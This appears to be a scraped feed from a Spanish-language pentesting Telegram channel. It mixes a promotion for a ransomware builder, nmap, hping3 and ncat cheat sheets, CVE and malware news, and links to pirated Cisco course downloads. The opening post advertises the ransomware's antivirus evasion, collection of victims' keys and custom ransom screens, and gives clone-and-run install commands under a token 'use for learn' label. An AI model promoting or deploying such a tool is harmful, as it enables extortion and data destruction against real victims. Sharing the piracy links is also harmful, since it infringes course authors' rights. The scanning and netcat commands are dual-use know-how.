Comunidad Pen7esting
3.58K subscribers
510 photos
40 videos
142 files
5.08K links
Download Telegram
NUCLEAR RANSOMWARE :)new update/more features
F E A T U R E S :

Generate a ransomware payload
With or without GUI payload

FUD (Fully Undetectable by Anti-Virus)

Works on Windows, MacOS and Linux

Super fast encryption with PyCrypto

Compile to EXE, APP or Unix/Linux executable

Custom icon for your EXE payload

Receive keys of victims

Decrypt files

Demo mode (payload won't encrypt anything)

Fullscreen mode (Warning takes over the screen)

Custom warning message for your victim

Custom image in your payload

Ghost mode (Rename by adding .DEMON extention instead
of encrypting the files)

Multiple encryption methods

Select file extentions to target

Decide if payload should self-destruct (Console mode feature
only)

Decide wich drive to target for encryption (working directory)

Verified server access through port forwarding VPN

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/leonv024/RAASNet.git

2) pip3 install -r requirements.txt

3) python3 RAASNet.py


On Linux, you might need to install these packages:

4) sudo apt install python3-tk python3-pil python3-pil.imagetk

5) Testing connection with remote server:

6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989

7) python3 test_socket.py

8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif

U S E F O R L E A R N
♨️ alertas de alto nivel para administradores de servidores windows

📛 vulnerabilidad RCE en Microsoft SQL Server 2016

🔸 mala gestión de las solicitudes de las páginas cargadas permite a los piratas informáticos cargar y explotar su código preferido en el contexto de los informes. El atacante puede enviar una página mano a mano al servicio de informes o al proveedor de informes e inyectar el código que desea.

Esta vulnerabilidad se puede rastrear al ID CVE-2020-0618, y los administradores del servidor pueden corregir cómo las solicitudes de página
https://www.exploit-db.com/exploits/48816
​​🔰 CCNA Complete Courses Free Download 🔰

Ⓜ️ The Cisco Certified Network Associate (CCNA) certification is the second level of Cisco’s five-level career certification process. A CCNA certification certifies a technician’s ability to install, set up, configure, troubleshoot and operate a medium-sized routed and switched computer network. This also includes implementing and verifying connections to a wide area network (WAN).

◾️ CCNA Security Latest Course Download:
https://mega.nz/#F!VooVWb5b!SYOifjCW569KQ5pkpe4taA

◾️ CCNA Wireless Latest Course Download:
https://mega.nz/#F!5k5RiBZD!3euwAjHUwTT2uDjSNd62PQ

◾️ CCNA Service Provider Latest Course Download:
https://mega.nz/#F!R4Q3hZpI!qKYBgyYPz5IbvGJp_2TNvA

◾️ CCNA Cyber Ops Latest Course Download:
https://mega.nz/#F!E8ZznLjK!7svH9q5kuygqXoeRSgGwmQ

◾️ CCNA Data Center Latest Course Download:
https://mega.nz/#F!44RBVLBD!Rz7MhffUkRKA3KT-X0f4Ng

◾️CCNA Routing and Switching Latest Course Download:
https://mega.nz/#F!44RBVLBD!Rz7MhffUkRKA3KT-X0f4Ng

◾️CCNA Cloud Latest Course Download:
https://mega.nz/#F!h8J1Rb5L!5Yr9Uc2deHaAcRe2cl1qMg

◾️ CCNA Collaboration Latest Course Download:
https://mega.nz/#F!xloRCCKR!T6grMYndq4x30YDPdQBSpQ
IP Network scanning

[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0

[+] NMAP Scans

[+] Nmap ping scan
sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE)


[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24

[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24

[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24

[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response

[+] Source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))
Source port also doesn't work for OS detection.

[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes

[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]

# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]

# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file

# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file

# Receive file
ncat [<host>] [<port>] > file

# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]

# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]

# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>

# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]

# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]
1
Los códigos fuente del banquero de Cerberus se publican en la darknet de forma gratuita

Hablando en el evento Kaspersky NEXT 2020, el experto de Kaspersky Lab, Dmitry Galov, dijo que la subasta para la venta de los códigos fuente del troyano bancario Android Cerberus obviamente no cumplió con las expectativas de los autores del malware. Como resultado, el código fuente se publicó de forma gratuita para usuarios premium en un popular foro de piratería en ruso, según ZDNet .

Permítanme recordarles que a finales de este verano ya escribimos sobre la venta de fuentes Cerberus. El precio comenzaba en 50.000 dólares y los autores del malware tenían la intención de realizar una subasta en incrementos de 1.000 dólares (sin embargo, por 100.000 dólares, el malware se puede comprar inmediatamente y sin regatear). Este precio incluía todo a la vez: desde el código fuente hasta la lista de clientes, junto con las instrucciones de instalación y los scripts para que los componentes funcionen juntos. Es decir, el comprador podría obtener el código fuente del APK malicioso, el módulo, así como las "claves" del panel de administración y los servidores.

Luego, el vendedor aseguró que la razón para vender el código fuente era simple: supuestamente, el grupo de piratas informáticos que creó Cerberus se había desintegrado y no había nadie más que brindara soporte las 24 horas del día. Como resultado, todo se puso a la venta, incluida una base de clientes con licencia activa, así como contactos de clientes y compradores potenciales. Al mismo tiempo, según el vendedor, Cerberus les traía a sus operadores alrededor de $ 10,000 al mes.

Ahora Galov dijo que los códigos fuente del banquero ahora se están distribuyendo bajo el nombre de Cerberus v2, y esto representa una gran amenaza para los usuarios de teléfonos inteligentes y el sector bancario en general. Parece que nadie estaba dispuesto a comprar el troyano ni siquiera por 50.000 dólares.

Según los expertos, tras la publicación de los códigos fuente en Europa y Rusia, ya se ha observado un aumento de las infecciones de malware móvil. Al mismo tiempo, Galov señaló que los operadores anteriores de Cerberus preferían no atacar a los usuarios rusos de dispositivos móviles, pero ahora el panorama ha cambiado significativamente.
National Vulnerability Database
CVE-2020-8253

Improper authentication in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 leads to the ability to access sensitive files.
Vulnerabilidad en Firefox for Android permite abrir URL en la víctima
https://blog.segu-info.com.ar/2020/09/vulnerabilidad-en-firefox-for-android.html
National Vulnerability Database
CVE-2020-4643

IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information. IBM X-Force ID: 185590.
CRLFuzz - A Fast Tool To Scan CRLF Vulnerability Written In Go https://t.co/JkG1BAJ7Zf
— Nicolas Krassas (@Dinosn) September 20, 2020
❗️ Revelan por qué no hay que usar un cargador ajeno de iPhone

🔸 La costumbre de pedir prestado un cargador de móvil puede traer consecuencias no deseadas a los usuarios de iPhones. Un artículo advierte de que el simple acto de conectar el celular a un cable de carga de otras personas, o usar el que se puede conseguir en un hotel o aeropuerto, representa una amenaza real para la seguridad de los datos personales que almacena el dispositivo.

SEPA MÁS - https://es.rt.com/7vi9
A new ransomware hacking group, named "OldGremlin," is aggressively targeting large corporate networks of medical labs, banks, manufacturers, and software developers in Russia.

https://thehackernews.com/2020/09/russian-ransomware-hack.html
This media is not supported in your browser
VIEW IN TELEGRAM